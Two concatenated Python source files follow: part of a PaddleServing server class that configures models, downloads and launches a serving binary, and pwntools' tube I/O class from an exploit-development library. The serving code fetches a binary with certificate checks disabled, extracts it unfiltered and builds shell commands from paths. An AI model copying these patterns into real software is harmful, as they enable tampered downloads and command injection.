self.resource_conf.model_toolkit_path.extend([workdir])
self.resource_conf.model_toolkit_file.extend(
[self.model_toolkit_fn[idx]])
self.resource_conf.general_model_path.extend([workdir])
self.resource_conf.general_model_file.extend(
[op_general_model_config_fn])
#TODO:figure out the meaning of product_name and container_id.
if self.product_name != None:
self.resource_conf.auth_product_name = self.product_name
if self.container_id != None:
self.resource_conf.auth_container_id = self.container_id
def _write_pb_str(self, filepath, pb_obj):
with open(filepath, "w") as fout:
fout.write(str(pb_obj))
def load_model_config(self, model_config_paths_args):
# At present, Serving needs to configure the model path in
# the resource.prototxt file to determine the input and output
# format of the workflow, and to ensure that the input and
# output of multiple models are the same.
if isinstance(model_config_paths_args, str):
model_config_paths_args = [model_config_paths_args]
for single_model_config in model_config_paths_args:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
if isinstance(model_config_paths_args, list):
# If there is only one model path, use the default infer_op.
# Because there are several infer_op type, we need to find
# it from workflow_conf.
default_engine_types = [
'GeneralInferOp',
'GeneralDistKVInferOp',
'GeneralDistKVQuantInferOp',
'GeneralDetectionOp',
]
# now only support single-workflow.
# TODO:support multi-workflow
model_config_paths_list_idx = 0
for node in self.workflow_conf.workflows[0].nodes:
if node.type in default_engine_types:
if node.name is None:
raise Exception(
"You have set the engine_name of Op. Please use the form {op: model_path} to configure model path"
)
f = open("{}/serving_server_conf.prototxt".format(
model_config_paths_args[model_config_paths_list_idx]),
'r')
self.model_conf[
node.name] = google.protobuf.text_format.Merge(
str(f.read()), m_config.GeneralModelConfig())
self.model_config_paths[
node.name] = model_config_paths_args[
model_config_paths_list_idx]
self.general_model_config_fn.append(
node.name + "/general_model.prototxt")
self.model_toolkit_fn.append(node.name +
"/model_toolkit.prototxt")
self.subdirectory.append(node.name)
model_config_paths_list_idx += 1
if model_config_paths_list_idx == len(
model_config_paths_args):
break
#Right now, this is not useful.
elif isinstance(model_config_paths_args, dict):
self.model_config_paths = collections.OrderedDict()
for node_str, path in model_config_paths_args.items():
node = server_sdk.DAGNode()
google.protobuf.text_format.Parse(node_str, node)
self.model_config_paths[node.name] = path
print("You have specified multiple model paths, please ensure "
"that the input and output of multiple models are the same.")
f = open("{}/serving_server_conf.prototxt".format(path), 'r')
self.model_conf[node.name] = google.protobuf.text_format.Merge(
str(f.read()), m_config.GeneralModelConfig())
else:
raise Exception(
"The type of model_config_paths must be str or list or "
"dict({op: model_path}), not {}.".format(
type(model_config_paths_args)))
# check config here
# print config here
def use_mkl(self, flag):
self.mkl_flag = flag
def get_device_version(self):
avx_flag = False
mkl_flag = self.mkl_flag
r = os.system("cat /proc/cpuinfo | grep avx > /dev/null 2>&1")
if r == 0:
avx_flag = True
if avx_flag:
if mkl_flag:
device_version = "cpu-avx-mkl"
else:
device_version = "cpu-avx-openblas"
else:
if mkl_flag:
print(
"Your CPU does not support AVX, server will running with noavx-openblas mode."
)
device_version = "cpu-noavx-openblas"
return device_version
def get_serving_bin_name(self):
if device_type == "0":
device_version = self.get_device_version()
elif device_type == "1":
if version_suffix == "101" or version_suffix == "102":
device_version = "gpu-" + version_suffix
else:
device_version = "gpu-cuda" + version_suffix
elif device_type == "2":
device_version = "xpu-" + platform.machine()
return device_version
def download_bin(self):
os.chdir(self.module_path)
need_download = False
#acquire lock
version_file = open("{}/version.py".format(self.module_path), "r")
folder_name = "serving-%s-%s" % (self.get_serving_bin_name(),
version_tag)
tar_name = "%s.tar.gz" % folder_name
bin_url = "https://paddle-serving.bj.bcebos.com/bin/%s" % tar_name
self.server_path = os.path.join(self.module_path, folder_name)
download_flag = "{}/{}.is_download".format(self.module_path,
folder_name)
fcntl.flock(version_file, fcntl.LOCK_EX)
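# The exclusive flock on version.py serializes concurrent server processes: only the
# first one downloads and unpacks the binary; the others block here and then return
# early once the .is_download flag exists. The lock is released when version_file is
# closed below.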
if os.path.exists(download_flag):
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
return
if not os.path.exists(self.server_path):
os.system("touch {}/{}.is_download".format(self.module_path,
folder_name))
print('First time run, downloading PaddleServing components ...')
r = os.system('wget ' + bin_url + ' --no-check-certificate')
if r != 0:
if os.path.exists(tar_name):
os.remove(tar_name)
raise SystemExit(
'Download failed, please check your network or permission of {}.'
.format(self.module_path))
else:
try:
print('Decompressing files ..')
tar = tarfile.open(tar_name)
tar.extractall()
tar.close()
except:
# Clean up a partially extracted folder before aborting.
if os.path.exists(self.server_path):
shutil.rmtree(self.server_path)
raise SystemExit(
'Decompressing failed, please check your permissions on {} or the remaining disk space.'
.format(self.module_path))
finally:
os.remove(tar_name)
#release lock
version_file.close()
os.chdir(self.cur_path)
self.bin_path = self.server_path + "/serving"
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
use_encryption_model=False,
cube_conf=None):
if workdir is None:
workdir = "./tmp"
os.system("mkdir -p {}".format(workdir))
else:
os.system("mkdir -p {}".format(workdir))
for subdir in self.subdirectory:
os.system("mkdir -p {}/{}".format(workdir, subdir))
os.system("touch {}/{}/fluid_time_file".format(workdir, subdir))
if not self.port_is_available(port):
raise SystemExit("Port {} is already used".format(port))
self.set_port(port)
self._prepare_resource(workdir, cube_conf)
self._prepare_engine(self.model_config_paths, device,
use_encryption_model)
self._prepare_infer_service(port)
self.workdir = workdir
infer_service_fn = "{}/{}".format(workdir, self.infer_service_fn)
self._write_pb_str(infer_service_fn, self.infer_service_conf)
workflow_fn = "{}/{}".format(workdir, self.workflow_fn)
self._write_pb_str(workflow_fn, self.workflow_conf)
resource_fn = "{}/{}".format(workdir, self.resource_fn)
self._write_pb_str(resource_fn, self.resource_conf)
for idx, single_model_toolkit_fn in enumerate(self.model_toolkit_fn):
model_toolkit_fn = "{}/{}".format(workdir, single_model_toolkit_fn)
self._write_pb_str(model_toolkit_fn, self.model_toolkit_conf[idx])
def port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
def run_server(self):
# just run server with system command
# currently we do not load cube
self.check_local_bin()
if not self.use_local_bin:
self.download_bin()
# wait for another process to finish downloading the server binary
while not os.path.exists(self.server_path):
time.sleep(1)
else:
print("Use local bin : {}".format(self.bin_path))
#self.check_cuda()
# TODO: merge CPU and GPU code, move device into model_toolkit
if self.device == "cpu" or self.device == "arm":
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-precision {} " \
"-use_calib {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.precision,
self.use_calib,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.max_body_size)
else:
command = "{} " \
"-enable_model_toolkit " \
"-inferservice_path {} " \
"-inferservice_file {} " \
"-max_concurrency {} " \
"-num_threads {} " \
"-port {} " \
"-precision {} " \
"-use_calib {} " \
"-reload_interval_s {} " \
"-resource_path {} " \
"-resource_file {} " \
"-workflow_path {} " \
"-workflow_file {} " \
"-bthread_concurrency {} " \
"-gpuid {} " \
"-max_body_size {} ".format(
self.bin_path,
self.workdir,
self.infer_service_fn,
self.max_concurrency,
self.num_threads,
self.port,
self.precision,
self.use_calib,
self.reload_interval_s,
self.workdir,
self.resource_fn,
self.workdir,
self.workflow_fn,
self.num_threads,
self.gpuid,
self.max_body_size)
print("Going to Run Comand")
print(command)
os.system(command)
class MultiLangServer(object):
def __init__(self):
self.bserver_ = Server()
self.worker_num_ = 4
self.body_size_ = 64 * 1024 * 1024
self.concurrency_ = 100000
self.is_multi_model_ = False # for model ensemble, which is not useful right now.
def set_max_concurrency(self, concurrency):
self.concurrency_ = concurrency
self.bserver_.set_max_concurrency(concurrency)
def set_device(self, device="cpu"):
self.device = device
def set_num_threads(self, threads):
self.worker_num_ = threads
self.bserver_.set_num_threads(threads)
def set_max_body_size(self, body_size):
self.bserver_.set_max_body_size(body_size)
if body_size >= self.body_size_:
self.body_size_ = body_size
else:
print(
"max_body_size is less than default value, will use default value in service."
)
def use_encryption_model(self, flag=False):
self.encryption_model = flag
def set_port(self, port):
self.gport_ = port
def set_precision(self, precision="fp32"):
self.precision = precision
def set_use_calib(self, use_calib=False):
self.use_calib = use_calib
def set_reload_interval(self, interval):
self.bserver_.set_reload_interval(interval)
def set_op_sequence(self, op_seq):
self.bserver_.set_op_sequence(op_seq)
def set_op_graph(self, op_graph):
self.bserver_.set_op_graph(op_graph)
def use_mkl(self, flag):
self.bserver_.use_mkl(flag)
def set_memory_optimize(self, flag=False):
self.bserver_.set_memory_optimize(flag)
def set_ir_optimize(self, flag=False):
self.bserver_.set_ir_optimize(flag)
def set_gpuid(self, gpuid=0):
self.bserver_.set_gpuid(gpuid)
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
else:
raise Exception("The type of model_config_paths must be str or list"
", not {}.".format(type(server_config_dir_paths)))
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.bserver_.load_model_config(server_config_dir_paths)
if client_config_path is None:
#now dict is not useful.
if isinstance(server_config_dir_paths, dict):
self.is_multi_model_ = True
client_config_path = []
for server_config_path_items in list(
server_config_dir_paths.items()):
client_config_path.append(server_config_path_items[1])
elif isinstance(server_config_dir_paths, list):
self.is_multi_model_ = False
client_config_path = server_config_dir_paths
else:
raise Exception(
"The type of model_config_paths must be str or list or "
"dict({op: model_path}), not {}.".format(
type(server_config_dir_paths)))
if isinstance(client_config_path, str):
client_config_path = [client_config_path]
elif isinstance(client_config_path, list):
pass
else:  # dict is not supported right now.
raise Exception(
"The type of client_config_path must be str or list or "
"dict({op: model_path}), not {}.".format(
type(client_config_path)))
if len(client_config_path) != len(server_config_dir_paths):
raise Warning(
"The len(client_config_path) is {}, != len(server_config_dir_paths) {}."
.format(len(client_config_path), len(server_config_dir_paths)))
self.bclient_config_path_list = client_config_path
def prepare_server(self,
workdir=None,
port=9292,
device="cpu",
use_encryption_model=False,
cube_conf=None):
if not self._port_is_available(port):
raise SystemExit("Prot {} is already used".format(port))
default_port = 12000
self.port_list_ = []
for i in range(1000):
if default_port + i != port and self._port_is_available(default_port
+ i):
self.port_list_.append(default_port + i)
break
self.bserver_.prepare_server(
workdir=workdir,
port=self.port_list_[0],
device=device,
use_encryption_model=use_encryption_model,
cube_conf=cube_conf)
self.set_port(port)
def _launch_brpc_service(self, bserver):
bserver.run_server()
def _port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
return result != 0
def run_server(self):
p_bserver = Process(
target=self._launch_brpc_service, args=(self.bserver_, ))
p_bserver.start()
options = [('grpc.max_send_message_length', self.body_size_),
('grpc.max_receive_message_length', self.body_size_)]
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.worker_num_),
options=options,
maximum_concurrent_rpcs=self.concurrency_)
multi_lang_general_model_service_pb2_grpc.add_MultiLangGeneralModelServiceServicer_to_server(
MultiLangServerServiceServicer(
self.bclient_config_path_list, self.is_multi_model_,
["0.0.0.0:{}".format(self.port_list_[0])]), server)
server.add_insecure_port('[::]:{}'.format(self.gport_))
server.start()
p_bserver.join()
server.wait_for_termination()
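# Minimal usage sketch only; this is not the packaged launch path (assumption: the
# op sequence is normally built with OpMaker/OpSeqMaker from this package, which are
# not shown in this excerpt, and the model directory name below is hypothetical).
if __name__ == "__main__":
    server = Server()
    # ... build a reader/infer/response op sequence and call
    # server.set_op_sequence(...) before loading the model ...
    server.set_num_threads(4)
    server.load_model_config("uci_housing_model")  # hypothetical model dir
    server.prepare_server(workdir="workdir", port=9393, device="cpu")
    server.run_server()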
|
tube.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
import logging
import re
import six
import string
import subprocess
import sys
import threading
import time
from six.moves import range
from pwnlib import atexit
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.timeout import Timeout
from pwnlib.tubes.buffer import Buffer
from pwnlib.util import fiddling
from pwnlib.util import misc
from pwnlib.util import packing
class tube(Timeout, Logger):
"""
Container of all the tube functions common to sockets, TTYs and SSH connections.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = b'\n'
def __init__(self, timeout = default, level = None, *a, **kw):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer(*a, **kw)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = None, timeout = default):
r"""recv(numb = 4096, timeout = default) -> bytes
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A bytes object containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: b'Hello, world'
>>> t.recv() == b'Hello, world'
True
>>> t.unrecv(b'Woohoo')
>>> t.recv() == b'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
b'Hello, world'
"""
numb = self.buffer.get_fill_size(numb)
return self._recv(numb, timeout) or b''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'hello'
>>> t.recv()
b'hello'
>>> t.recv()
b'hello'
>>> t.unrecv(b'world')
>>> t.recv()
b'world'
>>> t.recv()
b'hello'
"""
data = context._encode(data)
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: b'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
b'abc'
>>> len(t.buffer)
3
"""
data = b''
with self.local(timeout):
data = self.recv_raw(self.buffer.get_fill_size())
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if len(set(data)) == 1 and len(data) > 1:
self.indented('%r * %#x' % (data[0], len(data)), level = logging.DEBUG)
elif all(c in string.printable.encode() for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = None, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
Receives one chunk of data from the internal buffer, or from the OS if the
buffer is empty.
"""
numb = self.buffer.get_fill_size(numb)
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return b''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> bytes
Receives one byte at a time from the tube, until ``pred(all_bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A bytes object containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = b''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return b''
if res:
data += res
else:
self.unrecv(data)
return b''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
Receives exactly `numb` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> data = b'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[:1]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or b'a'
>>> t.recvn(10, timeout=0.05)
b''
>>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS
b'aaaaaa...'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return b''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout=default):
"""recvuntil(delims, drop=False, timeout=default) -> bytes
Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(bytes,tuple): Byte-string of delimiter characters, or a list of delimiter byte-strings.
drop(bool): Drop the ending. If :const:`True` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello World!"
>>> t.recvuntil(b' ')
b'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil((b' ',b'W',b'o',b'r'))
b'Hello'
>>> _=t.clean(0)
>>> # Matches on the full string
>>> t.recvuntil(b' Wor')
b'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(b' Wor', drop=True)
b'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello|World"
>>> t.recvuntil(b'|', drop=True)
b'Hello'
"""
# Convert string into a singleton tuple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(map(context._encode, delims))
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = b''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(b''.join(data) + top)
raise
if not res:
self.unrecv(b''.join(data) + top)
return b''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return b''.join(data) + top
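# Keep only the trailing bytes of 'top' (one more than the longest delimiter), so a
# delimiter split across recv() chunks can still be matched; commit the rest to 'data'.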
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return b''
def recvlines(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlines(numlines, keepends=False, timeout=default) -> list of bytes objects
Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (:const:`False`).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlines(3)
[b'', b'', b'']
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
[b'Foo', b'Bar', b'Baz']
>>> t.recvlines(3, True)
[b'Foo\n', b'Bar\n', b'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in range(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(b''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvlinesS(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlinesS(numlines, keepends=False, timeout=default) -> str list
This function is identical to :meth:`recvlines`, but decodes
the received bytes into string using :func:`context.encoding`.
You should use :meth:`recvlines` whenever possible for better performance.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlinesS(3)
['', '', '']
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlinesS(3)
['Foo', 'Bar', 'Baz']
"""
return [context._decode(x) for x in self.recvlines(numlines, keepends, timeout)]
def recvlinesb(self, numlines=2**20, keepends=False, timeout=default):
r"""recvlinesb(numlines, keepends=False, timeout=default) -> bytearray list
This function is identical to :meth:`recvlines`, but returns a bytearray.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'\n'
>>> t.recvlinesb(3)
[bytearray(b''), bytearray(b''), bytearray(b'')]
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\n'
>>> t.recvlinesb(3)
[bytearray(b'Foo'), bytearray(b'Bar'), bytearray(b'Baz')]
"""
return [bytearray(x) for x in self.recvlines(numlines, keepends, timeout)]
def recvline(self, keepends=True, timeout=default):
r"""recvline(keepends=True, timeout=default) -> bytes
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (:const:`True`).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'Foo\nBar\r\nBaz\n'
>>> t.recvline()
b'Foo\n'
>>> t.recvline()
b'Bar\r\n'
>>> t.recvline(keepends = False)
b'Baz'
>>> t.newline = b'\r\n'
>>> t.recvline(keepends = False)
b'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends=False, timeout=default):
r"""recvline_pred(pred, keepends=False) -> bytes
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns :const:`True`.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == b"Bar\n")
b'Bar'
>>> t.recvline_pred(lambda line: line == b"Bar\n", keepends=True)
b'Bar\n'
>>> t.recvline_pred(lambda line: line == b'Nope!', timeout=0.1)
b''
"""
tmpbuf = Buffer()
line = b''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.unget(tmpbuf)
raise
if not line:
self.buffer.unget(tmpbuf)
return b''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return b''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello\nWorld\nXylophone\n"
>>> t.recvline_contains(b'r')
b'World'
>>> f = lambda n: b"cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(b'pear')
b'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains((b'car', b'train'))
b'bicycle car train'
"""
if isinstance(items, (bytes, six.text_type)):
items = (items,)
items = tuple(map(context._encode, items))
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends=False, timeout=default):
r"""recvline_startswith(delims, keepends=False, timeout=default) -> bytes
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b"Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith((b'W',b'X',b'Y',b'Z'))
b'World'
>>> t.recvline_startswith((b'W',b'X',b'Y',b'Z'), True)
b'Xylophone\n'
>>> t.recvline_startswith(b'Wo')
b'World'
"""
# Convert string into a singleton tuple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(map(context._encode, delims))
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends=False, timeout=default):
r"""recvline_endswith(delims, keepends=False, timeout=default) -> bytes
Keep receiving lines until one is found that ends with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: b'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith(b'r')
b'Bar'
>>> t.recvline_endswith((b'a',b'b',b'c',b'd',b'e'), True)
b'Kaboodle\n'
>>> t.recvline_endswith(b'oodle')
b'Kaboodle'
"""
# Convert string into a singleton tuple
if isinstance(delims, (bytes, six.text_type)):
delims = (delims,)
delims = tuple(context._encode(delim) + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact=False, timeout=default):
"""recvregex(regex, exact=False, timeout=default) -> bytes
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (bytes, six.text_type)):
regex = context._encode(regex)
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact=False, keepends=False, timeout=default):
"""recvline_regex(regex, exact=False, keepends=False, timeout=default) -> bytes
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (bytes, six.text_type)):
regex = context._encode(regex)
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout=default):
"""recvrepeat(timeout=default) -> bytes
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... b'd',
... b'', # simulate timeout
... b'c',
... b'b',
... b'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
b'abc'
>>> t.recv()
b'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> bytes
Receives data until EOF is reached.
"""
with self.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
sent.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print(repr(x))
>>> t = tube()
>>> t.send_raw = p
>>> t.send(b'hello')
b'hello'
"""
data = context._encode(data)
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if len(set(data)) == 1:
self.indented('%r * %#x' % (data[0], len(data)))
elif all(c in string.printable.encode() for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=b''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print(repr(x))
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline(b'hello')
b'hello\n'
>>> t.newline = b'\r\n'
>>> t.sendline(b'hello')
b'hello\r\n'
"""
line = context._encode(line)
self.send(line + self.newline)
def sendlines(self, lines=[]):
for line in lines:
self.sendline(line)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout=timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout=timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data)
